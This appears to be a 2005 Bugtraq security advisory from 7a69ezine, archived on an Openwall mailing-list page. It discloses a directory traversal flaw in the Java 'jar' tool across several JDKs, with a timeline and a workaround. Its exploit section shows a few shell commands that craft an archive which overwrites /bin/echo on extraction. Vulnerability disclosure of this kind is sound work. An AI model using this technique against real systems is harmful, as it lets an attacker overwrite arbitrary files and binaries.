lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200504120226.10559.pluf@7a69ezine.org>
Date: Tue, 12 Apr 2005 02:26:10 +0200
From: Pluf <pluf@...9ezine.org>
To: bugtraq@...urityfocus.com
Subject: 7a69Adv#23 - Jar tool directory transversal vulnerability


- ------------------------------------------------------------------
       7a69ezine Advisories                      7a69Adv#23
- ------------------------------------------------------------------
  http://www.7a69ezine.org                            [01/04/2005]
- ------------------------------------------------------------------

Title:        Jar tool directory transversal vulnerability

Author:       Pluf - <pluf@...9ezine.org>

Remote:       no

Exploit:      yes

Severity:     Medium-High

- ------------------------------------------------------------------




I. Introduction.

Jar is a java archiving and compression application, which is part 
of many java development kits. It was desgined mainly to facilitate 
the packaging of java applets or applications into a single archive.




II. Description.

The jar tool does not check properly if the files to be extracted
have the string "../" on its names, so it's possible for an attacker
to create a malicious jar file in order to overwrite arbitrary files 
within the filesystem.




III. Affected Software.

The following java development kits have been tested and contain the
vulnerability, but maybe others kits and/or platforms could be affected 
by the same:
 
 * SUN:

    Sun's J2SE Development Kit 1.5.0 (Solaris, Windows and Linux version)
    Sun's J2SE Development Kit 1.4.2 (Solaris, Windows and Linux version)

 * IBM:

    IBM Java Development Kit 1.4.2 Linux 

 * BEA:

    BEA WebLogic's J2SE Development Kit, version 1.5.0 (Linux and Windows 
version)

 * BLACKDOWN:

    Blackdown Java Development Kit 1.4.2 Linux




IV. Exploit.

A malicious jar file can be created as follows:

java4fun# echo hi
hi
java4fun# jar cvf trash.jar *.class ..o..o..o..o..o..o..obinoecho
java4fun# ht trash.jar   (change the 'o' by '/')
java4fun# jar xvf trash.jar (no overwrite message confirmation)
java4fun# echo hi
hi, you've just infected yourself!!!




V. Patch.

Not available. 
Use unzip instead of jar.




VI. Timeline.

23/03/2005  Bug discovered.
28/03/2005 Mail sent to vendors.
28/03/2005 Sun response.
02/04/2005 Mail sent to vendors (second try)
09/04/2005 Advisory released




VII. Extra data

 You can find more 7a69ezine advisories on this following link:

    http://www.7a69ezine.org/avisos/propios [spanish info]




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ